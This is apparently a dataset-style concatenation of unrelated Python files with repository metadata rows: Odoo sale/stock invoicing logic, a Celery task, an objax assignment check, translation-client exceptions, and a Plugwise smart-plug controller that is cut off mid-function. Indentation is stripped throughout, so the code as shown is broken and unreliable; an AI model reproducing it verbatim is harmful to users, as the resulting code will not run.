def action_invoice_create(self, cr, uid, ids, grouped=False, states=['confirmed', 'done', 'exception'], date_invoice = False, context=None):
move_obj = self.pool.get("stock.move")
res = super(sale_order,self).action_invoice_create(cr, uid, ids, grouped=grouped, states=states, date_invoice = date_invoice, context=context)
for order in self.browse(cr, uid, ids, context=context):
if order.order_policy == 'picking':
for picking in order.picking_ids:
move_obj.write(cr, uid, [x.id for x in picking.move_lines], {'invoice_state': 'invoiced'}, context=context)
return res
def action_wait(self, cr, uid, ids, context=None):
res = super(sale_order, self).action_wait(cr, uid, ids, context=context)
for o in self.browse(cr, uid, ids):
noprod = self.test_no_product(cr, uid, o, context)
if noprod and o.order_policy=='picking':
self.write(cr, uid, [o.id], {'order_policy': 'manual'}, context=context)
return res
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
date_planned = super(sale_order, self)._get_date_planned(cr, uid, order, line, start_date, context=context)
date_planned = (date_planned - timedelta(days=order.company_id.security_lead)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return date_planned
def _prepare_procurement_group(self, cr, uid, order, context=None):
res = super(sale_order, self)._prepare_procurement_group(cr, uid, order, context=None)
res.update({'move_type': order.picking_policy})
return res
def action_ship_end(self, cr, uid, ids, context=None):
super(sale_order, self).action_ship_end(cr, uid, ids, context=context)
for order in self.browse(cr, uid, ids, context=context):
val = {'shipped': True}
if order.state == 'shipping_except':
val['state'] = 'progress'
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
res = self.write(cr, uid, [order.id], val)
return True
def has_stockable_products(self, cr, uid, ids, *args):
for order in self.browse(cr, uid, ids):
for order_line in order.order_line:
if order_line.product_id and order_line.product_id.type in ('product', 'consu'):
return True
return False
class product_product(osv.osv):
_inherit = 'product.product'
def need_procurement(self, cr, uid, ids, context=None):
#when sale/product is installed alone, there is no need to create procurements, but with sale_stock
#we must create a procurement for each product that is not a service.
for product in self.browse(cr, uid, ids, context=context):
if product.type != 'service':
return True
return super(product_product, self).need_procurement(cr, uid, ids, context=context)
class sale_order_line(osv.osv):
_inherit = 'sale.order.line'
def _number_packages(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
try:
res[line.id] = int((line.product_uom_qty+line.product_packaging.qty-0.0001) / line.product_packaging.qty)
except:
res[line.id] = 1
return res
_columns = {
'product_packaging': fields.many2one('product.packaging', 'Packaging'),
'number_packages': fields.function(_number_packages, type='integer', string='Number Packages'),
'route_id': fields.many2one('stock.location.route', 'Route', domain=[('sale_selectable', '=', True)]),
'product_tmpl_id': fields.related('product_id', 'product_tmpl_id', type='many2one', relation='product.template', string='Product Template'),
}
_defaults = {
'product_packaging': False,
}
def product_packaging_change(self, cr, uid, ids, pricelist, product, qty=0, uom=False,
partner_id=False, packaging=False, flag=False, context=None):
if not product:
return {'value': {'product_packaging': False}}
product_obj = self.pool.get('product.product')
product_uom_obj = self.pool.get('product.uom')
pack_obj = self.pool.get('product.packaging')
warning = {}
result = {}
warning_msgs = ''
if flag:
res = self.product_id_change(cr, uid, ids, pricelist=pricelist,
product=product, qty=qty, uom=uom, partner_id=partner_id,
packaging=packaging, flag=False, context=context)
warning_msgs = res.get('warning') and res['warning'].get('message', '') or ''
products = product_obj.browse(cr, uid, product, context=context)
if not products.packaging_ids:
packaging = result['product_packaging'] = False
if packaging:
default_uom = products.uom_id and products.uom_id.id
pack = pack_obj.browse(cr, uid, packaging, context=context)
q = product_uom_obj._compute_qty(cr, uid, uom, pack.qty, default_uom)
# qty = qty - qty % q + q
if qty and (q and not (qty % q) == 0):
ean = pack.ean or _('(n/a)')
qty_pack = pack.qty
type_ul = pack.ul
if not warning_msgs:
warn_msg = _("You selected a quantity of %d Units.\n"
"But it's not compatible with the selected packaging.\n"
"Here is a proposition of quantities according to the packaging:\n"
"EAN: %s Quantity: %s Type of ul: %s") % \
(qty, ean, qty_pack, type_ul.name)
warning_msgs += _("Picking Information ! : ") + warn_msg + "\n\n"
warning = {
'title': _('Configuration Error!'),
'message': warning_msgs
}
result['product_uom_qty'] = qty
return {'value': result, 'warning': warning}
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, warehouse_id=False, context=None):
context = context or {}
product_uom_obj = self.pool.get('product.uom')
product_obj = self.pool.get('product.product')
warehouse_obj = self.pool['stock.warehouse']
warning = {}
#UoM False due to hack which makes sure uom changes price, ... in product_id_change
res = self.product_id_change(cr, uid, ids, pricelist, product, qty=qty,
uom=False, qty_uos=qty_uos, uos=uos, name=name, partner_id=partner_id,
lang=lang, update_tax=update_tax, date_order=date_order, packaging=packaging, fiscal_position=fiscal_position, flag=flag, context=context)
if not product:
res['value'].update({'product_packaging': False})
return res
# set product uom in context to get virtual stock in current uom
if 'product_uom' in res.get('value', {}):
# use the uom changed by super call
context = dict(context, uom=res['value']['product_uom'])
elif uom:
# fallback on selected
context = dict(context, uom=uom)
#update of result obtained in super function
product_obj = product_obj.browse(cr, uid, product, context=context)
res['value'].update({'product_tmpl_id': product_obj.product_tmpl_id.id, 'delay': (product_obj.sale_delay or 0.0)})
# Calling product_packaging_change function after updating UoM
res_packing = self.product_packaging_change(cr, uid, ids, pricelist, product, qty, uom, partner_id, packaging, context=context)
res['value'].update(res_packing.get('value', {}))
warning_msgs = res_packing.get('warning') and res_packing['warning']['message'] or ''
if product_obj.type == 'product':
#determine if the product is MTO or not (for a further check)
isMto = False
if warehouse_id:
warehouse = warehouse_obj.browse(cr, uid, warehouse_id, context=context)
for product_route in product_obj.route_ids:
if warehouse.mto_pull_id and warehouse.mto_pull_id.route_id and warehouse.mto_pull_id.route_id.id == product_route.id:
isMto = True
break
else:
try:
mto_route_id = warehouse_obj._get_mto_route(cr, uid, context=context)
except:
# if route MTO not found in ir_model_data, we treat the product as in MTS
mto_route_id = False
if mto_route_id:
for product_route in product_obj.route_ids:
if product_route.id == mto_route_id:
isMto = True
break
#check if product is available, and if not: raise a warning, but do this only for products that aren't processed in MTO
if not isMto:
uom_record = False
if uom:
uom_record = product_uom_obj.browse(cr, uid, uom, context=context)
if product_obj.uom_id.category_id.id != uom_record.category_id.id:
uom_record = False
if not uom_record:
uom_record = product_obj.uom_id
compare_qty = float_compare(product_obj.virtual_available, qty, precision_rounding=uom_record.rounding)
if compare_qty == -1:
warn_msg = _('You plan to sell %.2f %s but you only have %.2f %s available !\nThe real stock is %.2f %s. (without reservations)') % \
(qty, uom_record.name,
max(0,product_obj.virtual_available), uom_record.name,
max(0,product_obj.qty_available), uom_record.name)
warning_msgs += _("Not enough stock ! : ") + warn_msg + "\n\n"
#update of warning messages
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
res.update({'warning': warning})
return res
class stock_move(osv.osv):
_inherit = 'stock.move'
def _create_invoice_line_from_vals(self, cr, uid, move, invoice_line_vals, context=None):
invoice_line_id = super(stock_move, self)._create_invoice_line_from_vals(cr, uid, move, invoice_line_vals, context=context)
if move.procurement_id and move.procurement_id.sale_line_id:
sale_line = move.procurement_id.sale_line_id
self.pool.get('sale.order.line').write(cr, uid, [sale_line.id], {
'invoice_lines': [(4, invoice_line_id)]
}, context=context)
self.pool.get('sale.order').write(cr, uid, [sale_line.order_id.id], {
'invoice_ids': [(4, invoice_line_vals['invoice_id'])],
})
sale_line_obj = self.pool.get('sale.order.line')
invoice_line_obj = self.pool.get('account.invoice.line')
sale_line_ids = sale_line_obj.search(cr, uid, [('order_id', '=', move.procurement_id.sale_line_id.order_id.id), ('invoiced', '=', False), '|', ('product_id', '=', False), ('product_id.type', '=', 'service')], context=context)
if sale_line_ids:
created_lines = sale_line_obj.invoice_line_create(cr, uid, sale_line_ids, context=context)
invoice_line_obj.write(cr, uid, created_lines, {'invoice_id': invoice_line_vals['invoice_id']}, context=context)
return invoice_line_id
def _get_master_data(self, cr, uid, move, company, context=None):
if move.procurement_id and move.procurement_id.sale_line_id and move.procurement_id.sale_line_id.order_id.order_policy == 'picking':
sale_order = move.procurement_id.sale_line_id.order_id
return sale_order.partner_invoice_id, sale_order.user_id.id, sale_order.pricelist_id.currency_id.id
elif move.picking_id.sale_id and context.get('inv_type') == 'out_invoice':
# In case of extra move, it is better to use the same data as the original moves
sale_order = move.picking_id.sale_id
return sale_order.partner_invoice_id, sale_order.user_id.id, sale_order.pricelist_id.currency_id.id
return super(stock_move, self)._get_master_data(cr, uid, move, company, context=context)
def _get_invoice_line_vals(self, cr, uid, move, partner, inv_type, context=None):
res = super(stock_move, self)._get_invoice_line_vals(cr, uid, move, partner, inv_type, context=context)
if move.procurement_id and move.procurement_id.sale_line_id:
sale_line = move.procurement_id.sale_line_id
res['invoice_line_tax_id'] = [(6, 0, [x.id for x in sale_line.tax_id])]
res['account_analytic_id'] = sale_line.order_id.project_id and sale_line.order_id.project_id.id or False
res['discount'] = sale_line.discount
if move.product_id.id != sale_line.product_id.id:
res['price_unit'] = self.pool['product.pricelist'].price_get(
cr, uid, [sale_line.order_id.pricelist_id.id],
move.product_id.id, move.product_uom_qty or 1.0,
sale_line.order_id.partner_id, context=context)[sale_line.order_id.pricelist_id.id]
else:
res['price_unit'] = sale_line.price_unit
uos_coeff = move.product_uom_qty and move.product_uos_qty / move.product_uom_qty or 1.0
res['price_unit'] = res['price_unit'] / uos_coeff
return res
def _get_moves_taxes(self, cr, uid, moves, context=None):
is_extra_move, extra_move_tax = super(stock_move, self)._get_moves_taxes(cr, uid, moves, context=context)
for move in moves:
if move.procurement_id and move.procurement_id.sale_line_id:
is_extra_move[move.id] = False
extra_move_tax[move.picking_id, move.product_id] = [(6, 0, [x.id for x in move.procurement_id.sale_line_id.tax_id])]
return (is_extra_move, extra_move_tax)
class stock_location_route(osv.osv):
_inherit = "stock.location.route"
_columns = {
'sale_selectable': fields.boolean("Selectable on Sales Order Line")
}
class stock_picking(osv.osv):
_inherit = "stock.picking"
def _get_partner_to_invoice(self, cr, uid, picking, context=None):
""" Inherit the original function of the 'stock' module
We select the partner of the sales order as the partner of the customer invoice
"""
saleorder_ids = self.pool['sale.order'].search(cr, uid, [('procurement_group_id' ,'=', picking.group_id.id)], context=context)
saleorders = self.pool['sale.order'].browse(cr, uid, saleorder_ids, context=context)
if saleorders and saleorders[0] and saleorders[0].order_policy == 'picking':
saleorder = saleorders[0]
return saleorder.partner_invoice_id.id
return super(stock_picking, self)._get_partner_to_invoice(cr, uid, picking, context=context)
def _get_sale_id(self, cr, uid, ids, name, args, context=None):
sale_obj = self.pool.get("sale.order")
res = {}
for picking in self.browse(cr, uid, ids, context=context):
res[picking.id] = False
if picking.group_id:
sale_ids = sale_obj.search(cr, uid, [('procurement_group_id', '=', picking.group_id.id)], context=context)
if sale_ids:
res[picking.id] = sale_ids[0]
return res
_columns = {
'sale_id': fields.function(_get_sale_id, type="many2one", relation="sale.order", string="Sale Order"),
}
def _create_invoice_from_picking(self, cr, uid, picking, vals, context=None):
sale_obj = self.pool.get('sale.order')
sale_line_obj = self.pool.get('sale.order.line')
invoice_line_obj = self.pool.get('account.invoice.line')
invoice_id = super(stock_picking, self)._create_invoice_from_picking(cr, uid, picking, vals, context=context)
return invoice_id
def _get_invoice_vals(self, cr, uid, key, inv_type, journal_id, move, context=None):
inv_vals = super(stock_picking, self)._get_invoice_vals(cr, uid, key, inv_type, journal_id, move, context=context)
sale = move.picking_id.sale_id
if sale:
inv_vals.update({
'fiscal_position': sale.fiscal_position.id,
'payment_term': sale.payment_term.id,
'user_id': sale.user_id.id,
'section_id': sale.section_id.id,
'name': sale.client_order_ref or '',
})
return inv_vals
|
Jgarcia-IAS/Fidelizacion_odoo
|
openerp/addons/sale_stock/sale_stock.py
|
Python
|
agpl-3.0
| 24,595 | 0.005733 |
from celery.task import task
import time
@task
def sleep(duration=10):
time.sleep(duration)
|
gmimano/commcaretest
|
corehq/apps/hqadmin/tasks.py
|
Python
|
bsd-3-clause
| 98 | 0.020408 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ['assert_assigned_type_and_shape_match']
import jax
from objax.typing import JaxArray
TRACER_TYPES = (jax.interpreters.partial_eval.JaxprTracer,
jax.interpreters.partial_eval.DynamicJaxprTracer)
def split_shape_and_device(array):
if isinstance(array, jax.interpreters.pxla.ShardedDeviceArray):
return array.shape[0], array.shape[1:]
else:
return None, array.shape
def assert_assigned_type_and_shape_match(existing_tensor, new_tensor):
assert isinstance(new_tensor, JaxArray.__args__), \
f'Assignments to variable must be an instance of JaxArray, but received f{type(new_tensor)}.'
new_tensor_device, new_tensor_shape = split_shape_and_device(new_tensor)
self_device, self_shape = split_shape_and_device(existing_tensor)
device_mismatch_error = f'Can not replicate a variable that is currently on ' \
f'{self_device} devices to {new_tensor_device} devices.'
assert (new_tensor_device is None) or (self_device is None) or (self_device == new_tensor_device), \
device_mismatch_error
shorter_length = min(len(new_tensor.shape), len(existing_tensor.shape))
is_special_ok = (isinstance(new_tensor, TRACER_TYPES) or isinstance(existing_tensor, TRACER_TYPES))
is_special_ok = is_special_ok and existing_tensor.shape[-shorter_length:] == new_tensor.shape[-shorter_length:]
shape_mismatch_error = f'Assign can not change shape of variable. The current variable shape is {self_shape},' \
f' but the requested new shape is {new_tensor_shape}.'
assert is_special_ok or new_tensor_shape == self_shape or new_tensor.shape == existing_tensor.shape, \
shape_mismatch_error
|
google/objax
|
objax/util/check.py
|
Python
|
apache-2.0
| 2,313 | 0.003891 |
# -*- coding: utf-8 -*-
# This file is part of translate.
#
# translate is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# translate is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# translate. If not, see <http://www.gnu.org/licenses/>.
"""
translate.client.exceptions
~~~~~~~~~~~~~~~~~~~~~~~~~~~
These are exception classes that are used by translate.client.Client. Most of
these classes are simple wrappers, just to differentiate different types of
errors. They can be constructed from a requests response object, or JSON
,returned from an API call.
"""
import json
import logging
log = logging.getLogger(__name__)
class TranslateException(Exception):
"""Mostly empty base class for exceptions relating to translate.
This class is used as a catch-all for exceptions thrown by the server. If
possible, a more specific subclass of this exception will be used.
"""
@classmethod
def from_json(cls, obj, status_code=400):
"""Return the proper exception class from the JSON object returned from
the server.
"""
exceptions = {
429: RateLimitException,
431: SizeLimitException,
452: TranslationException,
453: TranslatorException,
454: BadLanguagePairException
}
try:
code = obj['code'] if ('code' in obj) else status_code
klass = exceptions[code]
return klass.from_json(obj)
except KeyError:
return cls("Unknown error occured: " + repr(obj))
@classmethod
def from_response(cls, resp):
"""Generate a proper exception from the given requests response object
and return it.
"""
try:
obj = json.loads(resp.text)
return TranslateException.from_json(obj, resp.status_code)
except ValueError:
log.error("Was given invalid JSON, bailing...")
return TranslateException.from_json({}, resp.status_code)
class HTTPException(TranslateException):
"""Raised when an error occurs with the HTTP connection to the server
(e.g. host is not available, doesn't respond, etc.)
"""
pass
class RateLimitException(TranslateException):
"""Exception raised when a client goes over the ratelimit."""
def __init__(self, limit, per, reset):
self.limit = limit
self.per = per
self.reset = reset
@classmethod
def from_json(cls, obj):
try:
details = obj.get('details', {})
return cls(limit=details['limit'], per=details['per'],
reset=details['reset'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(limit=0, per=0, reset=0)
def __str__(self):
return "Rate limit exceeded: {0} reqs / {1}s. Try again at {2}".format(
self.limit, self.per, self.reset)
class SizeLimitException(TranslateException):
"""Exception raised when a client tries to translate a text that is over
the server's size limit.
"""
def __init__(self, len, limit):
self.len = len
self.limit = limit
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(len=details['len'], limit=details['limit'])
except KeyError:
log.error("Received invalid JSON: %s", repr(obj))
return cls(len=0, limit=0)
def __str__(self):
return "Specified text was too large: %d bytes. Maximum is %d bytes"\
.format(self.len, self.limit)
class TranslationException(TranslateException):
"""Returned on bad parameters to /translate"""
@classmethod
def from_json(cls, obj):
try:
msg = obj['message']
return cls("Bad parameters to translate API method: " + msg)
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls("Bad parameters to translate API method.")
class TranslatorException(TranslateException):
"""Returned when bad parameters are passed to the /translate method. (This
probably indicates some kind of API / Client bug.)
"""
def __init__(self, lang_pair, tried):
self.lang_pair = lang_pair
self.tried = tried
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
pair = (details['from'], details['to'])
return cls(lang_pair=pair, tried=details['tried'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'), tried=['unknown'])
def __str__(self):
return "Failed to translate {0} (tried: {1})".format(self.lang_pair,
self.tried)
class BadLanguagePairException(TranslateException):
"""Raised when the client tried to translate using a language pair not
supported by the server
"""
def __init__(self, lang_pair):
self.lang_pair = lang_pair
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(lang_pair=(details['from'], details['to']))
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'))
def __str__(self):
return "Unsupported language pair: {0}".format(self.lang_pair)
|
erik/translate
|
translate/client/exceptions.py
|
Python
|
gpl-3.0
| 5,955 | 0 |
#!/usr/bin/env python3
# Copyright (C) 2012,2013,2014,2015,2016,2017,2018,2019,2020 Seven Watt <info@sevenwatt.com>
# <http://www.sevenwatt.com>
#
# This file is part of Plugwise-2-py.
#
# Plugwise-2-py is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Plugwise-2-py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Plugwise-2-py. If not, see <http://www.gnu.org/licenses/>.
#
# The program is a major modification and extension to:
# python-plugwise - written in 2011 by Sven Petai <hadara@bsd.ee>
# which itself is inspired by Plugwise-on-Linux (POL):
# POL v0.2 - written in 2009 by Maarten Damen <http://www.maartendamen.com>
from serial.serialutil import SerialException
from plugwise import *
from swutil.util import *
from swutil.pwmqtt import *
from plugwise.api import *
from datetime import datetime, timedelta
import time
import calendar
import subprocess
import glob
import os
import logging
import queue
import threading
import itertools
mqtt = True
try:
import paho.mqtt.client as mosquitto
except:
mqtt = False
print(mqtt)
import pprint as pp
import json
#from json import encoder
#encoder.FLOAT_REPR = lambda o: format(o, '.2f')
json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
def jsondefault(object):
return object.decode('utf-8')
#DEBUG_PROTOCOL = False
log_comm(True)
#LOG_LEVEL = 2
schedules_path = "config/schedules"
cfg = json.load(open("config/pw-hostconfig.json"))
tmppath = cfg['tmp_path']+'/'
perpath = cfg['permanent_path']+'/'
logpath = cfg['log_path']+'/'
port = cfg['serial']
epochf = False
if 'log_format' in cfg and cfg['log_format'] == 'epoch':
epochf = True
actdir = 'pwact/'
actpre = 'pwact-'
actpost = '.log'
curpre = 'pwpower'
curpost = '.log'
logdir = 'pwlog/'
logpre = 'pw-'
logpost = '.log'
open_logcomm(logpath+"pw-communication.log")
#prepare for cleanup of /tmp after n days.
cleanage = 604800; # seven days in seconds
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
yrfolder = str(now.year)+'/'
if not os.path.exists(perpath+yrfolder+actdir):
os.makedirs(perpath+yrfolder+actdir)
if not os.path.exists(perpath+yrfolder+logdir):
os.makedirs(perpath+yrfolder+logdir)
if not os.path.exists(tmppath+yrfolder+actdir):
os.makedirs(tmppath+yrfolder+actdir)
rsyncing = True
if tmppath == None or tmppath == "/":
tmppath = perpath
rsyncing = False
if rsyncing:
# Could be a recovery after a power failure
# /tmp/pwact-* may have disappeared, while the persitent version exists
perfile = perpath + yrfolder + actdir + actpre + now.date().isoformat() + '*' + actpost
cmd = "rsync -aXuq " + perfile + " " + tmppath + yrfolder + actdir
subprocess.call(cmd, shell=True)
class PWControl(object):
"""Main program class
"""
def __init__(self):
"""
...
"""
global port
global tmppath
global curpre
global curpost
self.device = Stick(port, timeout=1)
self.staticconfig_fn = 'config/pw-conf.json'
self.control_fn = 'config/pw-control.json'
#self.schedule_fn = 'config/pw-schedules.json'
self.last_schedule_ts = None
self.last_control_ts = None
self.circles = []
self.schedules = []
self.controls = []
self.controlsjson = dict()
self.save_controls = False
self.bymac = dict()
self.byname = dict()
self.schedulebyname = dict()
self.curfname = tmppath + curpre + curpost
self.curfile = open(self.curfname, 'w')
self.statuslogfname = tmppath+'pw-status.json'
self.statusfile = open(self.statuslogfname, 'w')
self.statusdumpfname = perpath+'pw-statusdump.json'
self.actfiles = dict()
self.logfnames = dict()
self.daylogfnames = dict()
self.lastlogfname = perpath+'pwlastlog.log'
#read the static configuration
sconf = json.load(open(self.staticconfig_fn))
i=0
for item in sconf['static']:
#remove tabs which survive dialect='trimmed'
for key in item:
if isinstance(item[key],str): item[key] = item[key].strip()
item['mac'] = item['mac'].upper()
if item['production'].strip().lower() in ['true', '1', 't', 'y', 'yes', 'on']:
item['production'] = True
if 'revrse_pol' not in item:
item['reverse_pol'] = False
self.bymac[item.get('mac')]=i
self.byname[item.get('name')]=i
#exception handling timeouts done by circle object for init
self.circles.append(Circle(item['mac'], self.device, item))
self.set_interval_production(self.circles[-1])
i += 1
info("adding circle: %s" % (self.circles[-1].name,))
#retrieve last log addresses from persistent storage
with open(self.lastlogfname, 'a+') as f:
f.seek(0)
for line in f:
parts = line.split(',')
mac, logaddr = parts[0:2]
if len(parts) == 4:
idx = int(parts[2])
ts = int(parts[3])
else:
idx = 0
ts = 0
logaddr = int(logaddr)
debug("mac -%s- logaddr -%s- logaddr_idx -%s- logaddr_ts -%s-" % (mac, logaddr, idx, ts))
try:
self.circles[self.bymac[mac]].last_log = logaddr
self.circles[self.bymac[mac]].last_log_idx = idx
self.circles[self.bymac[mac]].last_log_ts = ts
except:
error("PWControl.__init__(): lastlog mac not found in circles")
self.schedulesstat = dict ((f, os.path.getmtime(f)) for f in glob.glob(schedules_path+'/*.json'))
self.schedules = self.read_schedules()
self.poll_configuration()
def get_relays(self):
"""
Update the relay state for circles with schedules enabled.
"""
for c in self.circles:
if c.online and c.schedule_state == 'on':
try:
c.get_info()
except (TimeoutException, SerialException, ValueError) as reason:
debug("Error in get_relays(): %s" % (reason,))
continue
#publish relay_state for schedule-operated circles.
#could also be done unconditionally every 15 minutes in main loop.
self.publish_circle_state(c.mac)
def get_status_json(self, mac):
try:
c = self.circles[self.bymac[mac]]
control = self.controls[self.controlsbymac[mac]]
except:
info("get_status_json: mac not found in circles or controls")
return ""
try:
status = c.get_status()
status["mac"] = status["mac"]
status["monitor"] = (control['monitor'].lower() == 'yes')
status["savelog"] = (control['savelog'].lower() == 'yes')
#json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
#msg = json.dumps(status, default = jsondefault)
msg = json.dumps(status)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in get_status_json: %s" % (reason,))
msg = ""
return str(msg)
def log_status(self):
self.statusfile.seek(0)
self.statusfile.truncate(0)
self.statusfile.write('{"circles": [\n')
comma = False
for c in self.circles:
if comma:
self.statusfile.write(",\n")
else:
comma = True
#json.dump(c.get_status(), self.statusfile, default = jsondefault)
self.statusfile.write(self.get_status_json(c.mac))
#str('{"typ":"circle","ts":%d,"mac":"%s","online":"%s","switch":"%s","schedule":"%s","power":%.2f,
#"avgpower1h":%.2f,"powts":%d,"seents":%d,"interval":%d,"production":%s,"monitor":%s,"savelog":%s}'
self.statusfile.write('\n] }\n')
self.statusfile.flush()
def dump_status(self):
self.statusdumpfile = open(self.statusdumpfname, 'w+')
self.statusdumpfile.write('{"circles": [\n')
comma = False
for c in self.circles:
if comma:
self.statusdumpfile.write(",\n")
else:
comma = True
json.dump(c.dump_status(), self.statusdumpfile, default = jsondefault)
self.statusdumpfile.write('\n] }\n')
self.statusdumpfile.close()
def sync_time(self):
for c in self.circles:
if not c.online:
continue
try:
info("sync_time: circle %s time is %s" % (c.aname, c.get_clock().isoformat()))
if c.type()=='circle+':
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
c.set_circleplus_datetime(now)
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
c.set_clock(now)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in sync_time: %s" % (reason,))
def set_interval_production(self, c):
if not c.online:
return
try:
#TODO: Check this. Previously log_interval was only set when difference between config file and circle state
c.set_log_interval(c.loginterval, c.production)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in set_interval_production: %s" % (reason,))
def generate_test_schedule(self, val):
#generate test schedules
if val == -2:
testschedule = []
for i in range (0, 336):
testschedule.append(-1)
testschedule.append(0)
else:
testschedule = []
for i in range (0, 672):
testschedule.append(val)
return testschedule
def read_schedules(self):
#read schedules
debug("read_schedules")
newschedules = []
self.schedulebyname = dict()
newschedules.append(self.generate_test_schedule(-2))
self.schedulebyname['__PW2PY__test-alternate']=0
info("generate schedule: __PW2PY__test-alternate")
newschedules.append(self.generate_test_schedule(10))
self.schedulebyname['__PW2PY__test-10']=1
info("generate schedule: __PW2PY__test-10")
i=len(newschedules)
schedule_names = [os.path.splitext(os.path.basename(x))[0] for x in glob.glob(schedules_path+'/*.json')]
for sched_fn in schedule_names:
schedfpath = schedules_path+'/'+sched_fn+'.json'
try:
rawsched = json.load(open(schedfpath))
self.schedulebyname[sched_fn]=i
newschedules.append(list(itertools.chain.from_iterable(rawsched['schedule'])))
info("import schedule: %s.json" % (sched_fn,))
#print("import schedule: %s.json" % (sched_fn,))
i += 1
except:
error("Unable to read or parse schedule file %s" % (schedfpath,))
return newschedules
def apply_schedule_changes(self):
""" in case off a failure to upload schedule,
c.online is set to False by api, so reload handled through
self.test_offline() and self.apply_<func>_to_circle
"""
debug("apply_schedule_changes()")
for c in self.circles:
if not c.online:
continue
if c.schedule != None:
if c.schedule.name in self.schedulebyname:
sched = self.schedules[self.schedulebyname[c.schedule.name]]
if sched != c.schedule._watt:
info("apply_schedule_changes: schedule changed. Update in circle %s - %s" % (c.name, c.schedule.name))
#schedule changed so upload to this circle
c.define_schedule(c.schedule.name, sched, time.localtime().tm_isdst)
try:
sched_state = c.schedule_state
c.schedule_off()
c.load_schedule(time.localtime().tm_isdst)
#update scheduleCRC
c.get_clock()
if sched_state == 'on':
c.schedule_on()
except (ValueError, TimeoutException, SerialException) as reason:
#failure to upload schedule.
c.undefine_schedule() #clear schedule forces a retry at next call
error("Error during uploading schedule: %s" % (reason,))
self.publish_circle_state(c.mac)
else:
error("Error during uploading schedule. Schedule %s not found." % (c.schedule.name,))
def read_apply_controls(self):
debug("read_apply_controls")
#read the user control settings
controls = json.load(open(self.control_fn))
self.controlsjson = controls
self.controlsbymac = dict()
newcontrols = []
i=0
for item in controls['dynamic']:
#remove tabs which survive dialect='trimmed'
for key in item:
if isinstance(item[key],str): item[key] = item[key].strip()
item['mac'] = item['mac'].upper()
newcontrols.append(item)
self.controlsbymac[item['mac']]=i
i += 1
#set log settings
if 'log_comm' in controls:
log_comm(str(controls['log_comm']).strip().lower() == 'yes')
info("COMMU with str() %s" % (str(controls['log_comm']).strip().lower() == 'yes',))
info("COMMU with u %s" % (controls['log_comm'].strip().lower() == 'yes',))
if 'log_level' in controls:
if str(controls['log_level']).strip().lower() == 'debug':
log_level(logging.DEBUG)
elif str(controls['log_level']).strip().lower() == 'info':
log_level(logging.INFO)
elif str(controls['log_level']).strip().lower() == 'error':
log_level(logging.ERROR)
else:
log_level(logging.INFO)
self.controls = newcontrols
for mac, idx in self.controlsbymac.items():
self.apply_control_to_circle(self.controls[idx], mac, force=False)
return
def apply_control_to_circle(self, control, mac, force=False):
"""apply control settings to circle
in case of a communication problem, c.online is set to False by api
self.test_offline() will apply the control settings again by calling this function
"""
updated = self.apply_schedule_to_circle(control, mac, force)
c = self.circles[self.bymac[mac]]
debug('circle mac: %s before1 - state [r,sw,sc] %s %s %s - scname %s' % (mac, c.relay_state, control['switch_state'], control['schedule_state'], control['schedule']))
debug('circle mac: %s before2 - state [r,sw,sc] %s %s %s' % (c.mac, c.relay_state, c.switch_state, c.schedule_state))
updated = updated | self.apply_schedstate_to_circle(control, mac, force)
if control['schedule_state'] != 'on':
updated = updated | self.apply_switch_to_circle(control, mac, force)
else:
#prime the switch state for consistency between circle and control
try:
c = self.circles[self.bymac[mac]]
updated = updated | (c.switch_state != control['switch_state'])
c.switch_state = control['switch_state']
except:
info("mac from controls not found in circles while prime switch state")
if updated:
self.publish_circle_state(mac)
debug('circle mac: %s after1 - state [r,sw,sc] %s %s %s - scname %s' % (mac, c.relay_state, control['switch_state'], control['schedule_state'], control['schedule']))
debug('circle mac: %s after2 - state [r,sw,sc] %s %s %s' % (c.mac, c.relay_state, c.switch_state, c.schedule_state))
def apply_schedule_to_circle(self, control, mac, force=False):
